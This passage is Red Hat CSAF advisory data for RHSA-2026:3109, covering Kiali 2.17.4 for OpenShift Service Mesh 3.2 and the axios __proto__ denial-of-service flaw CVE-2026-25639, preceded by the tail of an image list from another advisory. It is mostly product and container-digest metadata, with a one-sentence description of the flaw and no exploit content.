"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:3109
Vulnerability from csaf_redhat - Published: 2026-02-23 17:26 - Updated: 2026-04-16 10:28A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 2.17.4 for Red Hat OpenShift Service Mesh 3.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Kiali 2.17.4, for Red Hat OpenShift Service Mesh 3.2, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently.\n\nSecurity Fix(es):\n\n* kiali-ossmc-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n\n* kiali-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639) ",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3109",
"url": "https://access.redhat.com/errata/RHSA-2026:3109"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-25639",
"url": "https://access.redhat.com/security/cve/cve-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3109.json"
}
],
"title": "Red Hat Security Advisory: Kiali 2.17.4 for Red Hat OpenShift Service Mesh 3.2",
"tracking": {
"current_release_date": "2026-04-16T10:28:10+00:00",
"generator": {
"date": "2026-04-16T10:28:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3109",
"initial_release_date": "2026-02-23T17:26:20+00:00",
"revision_history": [
{
"date": "2026-02-23T17:26:20+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T17:26:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:28:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 3.2",
"product": {
"name": "Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:3.2::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385315"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-operator-bundle@sha256%3A7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771390706"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9-operator@sha256%3Ac772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771384898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229583"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385315"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9-operator@sha256%3A3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771384898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229583"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385315"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9-operator@sha256%3A44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771384898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229583"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771385315"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9-operator@sha256%3Aeec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771384898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771229583"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:078ecde6a72a12099911e201456d8ffd09b4c21796b6c54fa8295600a974790c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3dfca839b5427175801d0cc515dc36bf85e08c3ffea98aff51f703ada9821367_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:3fff336de41113a2fa449e12c7c3023c1569a4085c9ed3d58f588401a0638e49_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:8017912e8032510d47f667b8d17ddff6ff5a84576df2d484d09a6b0747454c4e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:eec3c51f0d991ad8b8b387adf284ded13d15a4db33b151a4ae4949716c6b2479_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:250cf403e11be8c7ed06e4660e8ed07c0a3b1d86d720735629fc28794d656ea2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:37b39a062649870a3b547e9310efbb5f720d413ccd6893c1ac660138d4388bf9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:5dc63a919b903103abba9331290438bb13864ae629078e0a698b23b57e0d7aa4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64 as a component of Red Hat OpenShift Service Mesh 3.2",
"product_id": "Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6fe6ac64e2216011a4880a72adfcf1ae853845df3bd125a01899f24bedbc7845_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 3.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-operator-bundle@sha256:7a78b11e11473268cf0d31a0e7644995ded09e22419fc8f5400e54bf85acbc6a_amd64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:3416a57b9f3d949a27d8b086bda2a092398d8bb83c12c1ca69fa72d41611f4be_arm64",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:44f463726ee4bb36daa3f35b7322c9a51f964f736509a20bed34411dd5aa6914_ppc64le",
"Red Hat OpenShift Service Mesh 3.2:registry.redhat.io/openshift-service-mesh/kiali-rhel9-operator@sha256:c772061859ad2bea98022c4a7e20dd731c5e468d8a91cd57576b0037cc500707_amd64",
